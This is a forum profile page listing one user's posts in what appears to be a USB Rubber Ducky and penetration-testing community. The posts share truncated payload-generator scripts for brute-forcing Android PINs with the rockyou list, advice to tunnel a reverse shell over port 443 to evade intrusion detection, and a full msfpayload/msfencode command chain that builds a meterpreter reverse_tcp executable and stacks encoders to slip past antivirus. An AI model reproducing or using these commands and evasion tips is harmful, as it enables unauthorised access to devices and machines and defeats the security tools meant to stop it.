
CaptainHooligan (Active Members)

  • Content Count: 12
  • Days Won: 1

Everything posted by CaptainHooligan

  1. Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo-framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.

         #!/bin/bash
         #
         # Payload-Generator version 1.0
         # This tool is licensed under the GPLv3. Currently maintained by
         # James Luther (CaptainHooligan)
         #
         # This tool is used to generate payloads for the USB Rubber Ducky
         #
         # ===============================================================
  2. Good call! As always the more research you do on a target the better prepared you can be.
  3. Great share! Just as mentioned above, some AV solutions include a Host Based Security System (HBSS) which can whitelist hardware as well as software. In an environment that uses all Dell keyboards or just specific ones that do not use generic drivers this attack would be defeated.
  4. That was pretty much the point I was trying to make: there is always a way to get around whatever security implementations you run into. The duck does appear as an HID, which means whatever user limits we run into are what we have to deal with. If the security implementation has application whitelisting, the download will not matter, as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators. Either way, know the environment and plan accordingly, as there is always a way when thinking outside the box.
  5. It doesn't really matter what limitations are set on users. There will always be some way to bypass security in one way or another. For example: a robust firewall solution combined with application whitelisting, limited permissions and USB mass storage disabled means you aren't going to be able to download a file, nor will you be able to bring one in.
  6. This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc. Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here: https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing
  7. An easy thought is: can these PCs access the internet behind the routers and firewall? If so, just run a secure reverse shell over 443. Some IDS will look at the TCP stream and see the amount of traffic as anomalous, but most will see encrypted traffic and ignore it.
  8. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it, as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time, as there is no "5 passwords, then wait" limiter. Here is a script that will grab rockyou.txt and create a payload for you in Linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds, as if attacking the encryption logon screen.

         #!/bin/bash
         clear
         echo -e "====================================================
  9. Check out dSploit. It is an open source project similar to this.
  10. I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:

         msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | \
           msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
           msfencode -e x86/alpha_upper -c 2 -t raw | \
           msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
           msfencode -e x86/countdown -c 5 -t exe > payload.exe

      That sometimes still gets caught, which is when I use a custom template, which isn't too hard to do. Any Windows executable can be used as a template. ProcessExplorer is an easy one to g
  11. Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it, as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time, as there is no "5 passwords, then wait" limiter. ** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in Linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds, as if attacking the encryption logon screen.

         #!/bin/bash
         clear
         echo -e "=====================================